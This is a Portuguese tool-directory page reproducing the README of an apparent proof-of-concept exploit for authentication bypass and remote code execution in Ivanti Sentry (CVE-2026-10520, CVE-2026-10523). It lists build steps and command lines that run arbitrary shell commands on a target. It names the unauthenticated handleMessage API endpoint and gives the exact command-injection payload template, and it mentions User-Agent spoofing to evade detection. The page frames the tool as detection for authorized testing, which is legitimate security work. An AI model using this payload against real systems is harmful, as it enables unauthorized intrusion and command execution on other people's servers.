Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-10523-Ivanti-sentry — Ferramenta de detecção de prova de conceito para vulnerabilidades de bypass de autenticação e execução remota de código no Ivanti Sentry (CVE-2026-10520, CVE-2026-10523). Envia requisições de API elaboradas para executar comandos do sistema e validar implantações vulneráveis. | Kitploit
Ferramentas/GitHubGitHub/gagaltotal/cve-2026-10523-ivanti-sentry
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleAutenticação
GitHubgagaltotal/cve-2026-10523-ivanti-sentry

CVE-2026-10523-Ivanti-sentry

Ferramenta de detecção de prova de conceito para vulnerabilidades de bypass de autenticação e execução remota de código no Ivanti Sentry (CVE-2026-10520, CVE-2026-10523). Envia requisições de API elaboradas para executar comandos do sistema e validar implantações vulneráveis.

Ver RepositórioSite
313há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-10523 - Ferramenta de Detecção de RCE do Ivanti Sentry

Uma ferramenta de detecção abrangente de prova de conceito para testar vulnerabilidades do Ivanti Sentry relacionadas a bypass de autenticação e execução remota de código. Esta ferramenta identifica sistemas vulneráveis ao CVE-2026-10520 e CVE-2026-10523.

Visão Geral

Este projeto foi projetado para detectar e validar se uma instância do Ivanti Sentry é vulnerável a falhas críticas de bypass de autenticação e execução remota de código. A ferramenta envia mensagens especialmente elaboradas através do endpoint da API do Ivanti Sentry para executar comandos do sistema e extrair os resultados, permitindo que pesquisadores de segurança e testadores de penetração identifiquem implantações vulneráveis.

Detalhes da Vulnerabilidade

CVE-2026-10520

Vulnerabilidade de bypass de autenticação no Ivanti Sentry que permite acesso não autenticado a endpoints de API restritos.

CVE-2026-10523

Vulnerabilidade de execução remota de código no Ivanti Sentry que permite a execução de comandos arbitrários do sistema através da API de mensagens quando combinada com o bypass de autenticação.

Funcionalidades

  • Detecção não autenticada de instâncias vulneráveis do Ivanti Sentry
  • Capacidade de execução de comandos do sistema para validação de prova de conceito
  • Suporte para conexões HTTP e HTTPS com bypass de verificação TLS
  • Suporte a proxy para testes através de intermediários
  • Extração limpa da saída de comando a partir de respostas XML
  • Tratamento seguro de erros com feedback informativo
  • Limites configuráveis de tempo limite e tamanho de resposta

Requisitos

  • Go 1.26.4 ou superior
  • Acesso de rede à instância alvo do Ivanti Sentry
  • URL de destino válida com protocolo (HTTP ou HTTPS)

Instalação

Clone o repositório e navegue até o diretório do projeto:

root@kitploit:~
git clone https://github.com/gagaltotal/CVE-2026-10523-Ivanti-sentry
cd CVE-2026-10523-Ivanti-sentry

Obtenha o init e a biblioteca de pacotes

root@kitploit:~
go mod init CVE-2026-10523-Ivanti-sentry
go mod tidy

Compile o executável:

root@kitploit:~
go build -o tot_poc tot_poc.go

Uso

Screen Capture

A ferramenta requer dois parâmetros obrigatórios: URL de destino e comando a ser executado.

Uso Básico

Screen Capture

Execute um comando simples no alvo:

root@kitploit:~
./tot_poc -url https://target.example.com:8443 -cmd "uname -a"

Opções de Linha de Comando

  • -url (obrigatório): URL base do destino incluindo protocolo (ex.: https://127.0.0.1:8443)
  • -cmd (obrigatório): Comando a ser executado para detecção de vulnerabilidade (ex.: "uname -a", "id", "whoami")
  • -p ou -proxy (opcional): Endereço e porta do proxy para roteamento de tráfego (ex.: 127.0.0.1:8080)

Exemplos de Uso

Screen Capture

Detecte vulnerabilidade com comando simples de informação do sistema:

root@kitploit:~
./tot_poc -url https://192.168.1.100:8443 -cmd "uname -a"

Execute com configuração de proxy:

root@kitploit:~
./tot_poc -url https://target.example.com:8443 -cmd "whoami" -proxy 127.0.0.1:8080

Execute comando para extrair informações do sistema:

root@kitploit:~
./tot_poc -url https://sentry-instance.internal:8443 -cmd "cat /etc/os-release"

Saída

A ferramenta exibirá:

  1. Um banner com informações sobre a vulnerabilidade
  2. URL de destino, comando e configuração de proxy (se aplicável)
  3. Mensagens de status em tempo real indicando o progresso da requisição
  4. Resultados da execução do comando se o alvo estiver vulnerável
  5. Mensagens de erro se o alvo não estiver vulnerável ou a conexão falhar

Saída de Detecção Bem-sucedida

root@kitploit:~
Target: https://192.168.1.100:8443
Command: uname -a

[+] Sending command execution check to: https://192.168.1.100:8443/mics/api/v2/sentry/mics-config/handleMessage
[+] Target appears to be vulnerable.

Command output:
Linux sentry-server 5.10.0-8-generic x86_64 GNU/Linux

Saída de Detecção com Falha

root@kitploit:~
Target: https://192.168.1.100:8443
Command: uname -a

[+] Sending command execution check to: https://192.168.1.100:8443/mics/api/v2/sentry/mics-config/handleMessage
[-] Target does not appear to be vulnerable.

Detalhes Técnicos

Vetor de Ataque

A ferramenta explora o endpoint /mics/api/v2/sentry/mics-config/handleMessage que é acessível sem autenticação. O payload é construído como:

root@kitploit:~
message=execute+system+/configuration/system/commandexec+<commandexec><index>1</index><reqandres>[COMMAND]</reqandres></commandexec>

A resposta contém a saída do comando em formato XML dentro de uma tag de sucesso.

Recursos de Segurança

  • Bypass de verificação TLS para testar certificados autoassinados
  • Timeouts HTTP configuráveis para evitar requisições travadas
  • Limitação de tamanho de resposta (10 MB) para evitar esgotamento de memória
  • Tratamento adequado de erros para respostas malformadas
  • Spoofing de User-Agent para evitar mecanismos simples de detecção

Como Funciona

  1. Analisar argumentos da linha de comando para URL de destino e comando
  2. Criar cliente HTTP com configuração opcional de proxy
  3. Construir payload com o comando fornecido pelo usuário
  4. Enviar requisição POST para o endpoint vulnerável
  5. Extrair a saída do comando da estrutura de resposta XML
  6. Exibir resultados ou mensagens de erro de acordo

Aviso Legal

Esta ferramenta é fornecida apenas para fins autorizados de teste de segurança e pesquisa. Os usuários são os únicos responsáveis por garantir que possuem a devida autorização antes de testar qualquer sistema. O acesso não autorizado a sistemas de computador é ilegal. Os autores não assumem nenhuma responsabilidade por uso indevido ou danos causados por esta ferramenta.

Requisitos e Limitações

  • O alvo deve ser uma instância vulnerável do Ivanti Sentry
  • É necessária conectividade de rede com o sistema alvo
  • O tempo limite padrão é de 10 segundos por requisição
  • O tamanho máximo da resposta é limitado a 10 MB
  • Apenas eficaz em sistemas que executam versões vulneráveis do Ivanti Sentry
  • A validação do certificado TLS está desabilitada para fins de teste

Autor

GhostGTR666 - Gagaltotal666

Repositório

https://github.com/gagaltotal/CVE-2026-10523-Ivanti-sentry

Licença

Este projeto é fornecido como está para fins educacionais e de pesquisa em segurança.

Referências

  • CVE-2026-10520: Bypass de Autenticação do Ivanti Sentry
  • CVE-2026-10523: Execução Remota de Código do Ivanti Sentry
Baixar ferramenta